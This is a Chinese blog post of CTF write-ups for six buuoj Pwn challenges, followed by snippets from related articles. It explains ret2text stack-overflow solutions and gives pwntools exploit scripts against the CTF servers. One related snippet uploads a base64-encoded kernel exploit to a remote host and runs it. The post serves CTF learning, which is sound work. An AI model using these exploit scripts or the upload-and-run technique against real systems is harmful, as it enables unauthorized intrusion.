buuoj Pwn wp 1-10

PWN题解题思路与技巧分享
最新推荐文章于 2022-05-22 12:56:23 发布
原创 最新推荐文章于 2022-05-22 12:56:23 发布 · 778 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全

本文围绕多个PWN题展开,涉及test_your_nc、rip等题目。介绍了ret2text、ROP、ret2libc、格式化字符串漏洞、整数溢出等解题方法,还提及栈溢出、函数加密绕过、栈对齐等要点,同时给出各题的exp及遇到的问题和解决思路。

01 test_your_nc

在这里插入图片描述
直接连上就好了。

在这里插入图片描述
然后 cat flag 。

02 rip

ret2text.

在这里插入图片描述这题多多少少有点问题。
IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。

在这里插入图片描述
栈溢出到返回地址就行。

from pwn import*

r = remote("node3.buuoj.cn",26737)
context.log_level = "debug"

system_addr = 0x401187

payload = 'a' * 23 + p64(system_addr)
r.sendline(payload)

r.interactive()

libc2.27以后 或者ubuntu18以后,system要求栈对齐。

参考链接1

参考链接2

03 warmup_csaw_2016

ret2text.

先查一下保护
在这里插入图片描述
确实是新手题,保护一点没有。
拖IDA

在这里插入图片描述后门函数在这里

在这里插入图片描述这里是漏洞点,就是gets函数导致一个栈溢出,所以直接ret2text。

exp

from pwn import*

r = remote("node3.buuoj.cn",26473)

payload = 'a' * 0x48  + p64(0x40060d)
r.sendlineafter(">",payload)

r.interactive()

04 pwn1_sctf_2016

ret2text.

在这里插入图片描述
查查保护,就开了个NX。

在这里插入图片描述

看这烦人的C++反编译

打远程的时候发现第一句话之前有个输入,但是上图中看不出来,于是看它的反汇编。

在这里插入图片描述
问题就处在上面这里,它是并列的……
就是c++里面那些特有的函数有点长

补充个函数。
C 库函数 char *fgets(char *str, int n, FILE *stream) 从指定的流 stream 读取一行,并把它存储在 str 所指向的字符串内。当读取 (n-1) 个字符时,或者读取到换行符时,或者到达文件末尾时,它会停止,具体视情况而定。

这个程序翻译过来就是,它会把你的输入里面的所有I替换成you,所以你看到其实你想栈溢出是不能的,因为可输入的长度不够,需要60的长度,所以你只需要输20个I,然后就能接溢出了。

这个题它的重点是C++的反汇编,里面多数是实现对string类的操作,比如重载+,=等等,分析的时候要有耐心慢慢来。

溢出的话还找到它的后门函数,就OK了。
在这里插入图片描述exp

from pwn import*

r = remote("node3.buuoj.cn",26776)
context.log_level = "debug"

payload = 'I' * 20  + 'aaaa'+ p32(0x8048F0D)
r.sendline(payload)


r.interactive()

05 ciscn_2019_n_1

ret2text.

在这里插入图片描述
查一波保护,有个堆栈不可执行,但是没关系,他有后门函数。

在这里插入图片描述
其实我首先想的是我能不能通过gets把v2覆盖成11.28125,我好好研究了一下python的float。

python的float与c的float完全不同,因此对python而言并不存在于一个float是四个字节的说法。
所以用python写脚本的话就直接写字节码进去算了。
在这里就不写了。

正常的话就是直接把返回地址改一下就好了。
exp

from pwn import*

context.log_level = "debug"
r = remote("node3.buuoj.cn",26325)

payload = 'a' * 0x38 + p64(0x4006be)  
r.sendlineafter("Let's guess the number.",payload)

r.interactive()

06 jarvisoj_level0

ret2text

在这里插入图片描述
在这里插入图片描述这没啥说的,里面有后门函数,直接栈溢出就好了。

exp

from pwn import*

r = remote('node3.buuoj.cn',25064)

payload = 'a' * 0x88 + p64(0x400596)
r.sendlineafter
最低0.47元/天 解锁文章
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 404
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 2045
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
buuoj pwn
FFY's Blog
10-07 1201
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 613
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
Buuoj Pwn
VisualNull的博客
05-22 376
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
BUUOj PWN 121-140
2h4ox1n9
12-17 178
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 364
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 433
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 421
271 espcially_tu_2016 就是一个栈溢出。 但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问题还是ios_c99scanf的问题,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 423
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 473
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 359
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2365
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 3839
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 503
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 573
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 344
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 1102
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
ctfshow-pwnwp
最新发布
09-17
CTFShow平台PWN题的解题思路和过程在不同题目中有所不同。以CTFSHOW PWN02为例,解题脚本通过`pwn`库进行操作。脚本根据`contect`变量的值来选择是本地运行程序还是远程连接目标服务器。构造了长度为13个字节的`a`字符的`payload`,并拼接上函数地址`0X804850F`,将其发送给目标程序,最后进入交互模式与程序进行交互,可能是通过溢出覆盖返回地址来执行指定函数,以达到解题目的[^1]。 对于CTFShow PWN入门的Kernel PWN 356 - 360相关题目,解题脚本先将本地的`exp`文件内容进行Base64编码,然后分块发送到远程服务器上的`/tmp/b64_exp`文件中。接着将Base64编码的内容解码成可执行文件`/tmp/exploit`,为其添加执行权限,最后执行该文件并进入交互模式。该过程可能是利用内核漏洞,通过上传并执行本地编写的漏洞利用脚本,来获取远程服务器的控制权[^3]。 ### 代码示例 CTFSHOW PWN02解题脚本: ```python from pwn import * contect = 1 def main(): if contect == 0: p = process("./stack") else: p = remote("pwn.challenge.ctf.show", 28103) payload = b'a' * 13 payload += p32(0X804850F) p.sendline(payload) p.interactive() main() ``` CTFShow PWN入门Kernel PWN相关题目的解题脚本: ```python from pwn import * import base64 context.log_level = "debug" with open("./exp", "rb") as f: exp = base64.b64encode(f.read()) p = remote("pwn.challenge.ctf.show", 28304) p.recvuntil(b"$ ") p.sendline(b"ls") count = 0 for i in range(0, len(exp), 0x200): p.recvuntil(b"/ $ ") p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp") count += 1 log.info("count: " + str(count)) p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit") p.sendline("chmod +x /tmp/exploit") p.sendline("/tmp/exploit ") p.interactive() ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值